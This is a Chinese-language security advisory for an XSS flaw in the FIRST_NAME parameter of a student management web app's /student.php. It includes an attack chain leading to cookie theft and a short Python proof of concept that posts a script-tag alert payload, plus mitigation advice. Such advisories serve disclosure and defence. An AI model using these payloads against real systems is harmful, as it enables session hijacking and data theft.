CVE-2026-9471 StudentManagementSystem XSS漏洞

漏洞信息

漏洞编号

CVE-2026-9471

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

StudentManagementSystem

漏洞概述

CVE-2026-9471 是 StudentManagementSystem 系统中发现的一个跨站脚本攻击（XSS）漏洞。该漏洞主要影响 `/student.php` 文件的处理逻辑，由于未对 `FIRST_NAME` 参数进行充分的净化处理，允许攻击者注入恶意脚本。该漏洞需要低权限用户交互才能触发，虽然CVSS评分较低，但攻击者可利用此漏洞执行任意JavaScript代码，进而窃取敏感信息或进行钓鱼攻击。目前该漏洞利用代码已公开，需引起重视。

技术细节

该漏洞的根源在于 StudentManagementSystem 在处理学生信息录入时，未能正确过滤用户提供的输入数据。具体而言，在 `/student.php` 接口中，`FIRST_NAME` 参数直接被拼接到HTML响应中，而未经过上下文相关的输出编码。攻击者只需具备低权限账号，即可构造包含 `<script>`、`<img>` 等恶意标签的Payload。当具有高权限的用户（如管理员）访问包含该恶意数据的页面时，Payload将在浏览器端执行。利用方式包括窃取Session ID、绕过同源策略限制以及篡改页面内容。由于项目采用持续交付模式，缺乏明确的版本控制，这使得补丁管理变得复杂，建议从代码层面进行紧急修复。

攻击链分析

STEP 1

侦查

攻击者识别目标系统运行的是 StudentManagementSystem，并定位到 /student.php 接口。

STEP 2

构造载荷

攻击者创建包含恶意 JavaScript 代码的 Payload，并将其嵌入到 `FIRST_NAME` 参数中。

STEP 3

执行攻击

攻击者使用低权限账户向服务器提交包含 Payload 的请求，恶意数据被存储或反射。

STEP 4

诱导交互

攻击者诱导管理员或其他用户访问包含恶意数据的页面（触发 UI:R 交互）。

STEP 5

达成目的

受害者的浏览器解析并执行恶意脚本，导致 Cookie 窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-9471
# Target: StudentManagementSystem /student.php
# Vulnerable Parameter: FIRST_NAME

import requests

def check_xss(target_url):
    # Payload to trigger an alert box
    xss_payload = "<script>alert('CVE-2026-9471_XSS');</script>"
    
    # Data to be sent to the vulnerable endpoint
    # Assuming standard POST data structure based on the parameter name
    data = {
        "FIRST_NAME": xss_payload,
        "LAST_NAME": "Test",
        # Add other required parameters if necessary
    }
    
    try:
        response = requests.post(target_url, data=data)
        
        # Check if the payload is reflected in the response without encoding
        if xss_payload in response.text:
            print("[!] Vulnerability Confirmed: XSS is possible.")
            return True
        else:
            print("[-] Vulnerability not detected or payload was encoded.")
            return False
    except Exception as e:
        print(f"[Error] {e}")
        return False

if __name__ == "__main__":
    url = "http://target-host/student.php"
    check_xss(url)

影响范围

StudentManagementSystem (commit cb2f558ddf8d19396de0f92abf2d224d46a0a203 及更早版本)

StudentManagementSystem (持续交付版本)

防御指南

临时缓解措施

建议开发者立即审查并修复 `/student.php` 文件中的代码，对 `FIRST_NAME` 字段实施严格的输出编码。在官方更新发布前，管理员应限制对系统的访问权限，并对用户输入进行临时过滤，同时教育用户不要点击来源不明的链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9471
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9471
3 Details https://www.cvedetails.com/cve/CVE-2026-9471/
4 VulDB https://vuldb.com/cve/CVE-2026-9471
5 Link https://github.com/yashpokharna2555/StudentManagementSystem/
6 Link https://github.com/yashpokharna2555/StudentManagementSystem/issues/4
7 Link https://vuldb.com/submit/814002
8 Link https://vuldb.com/vuln/365452
9 Link https://vuldb.com/vuln/365452/cti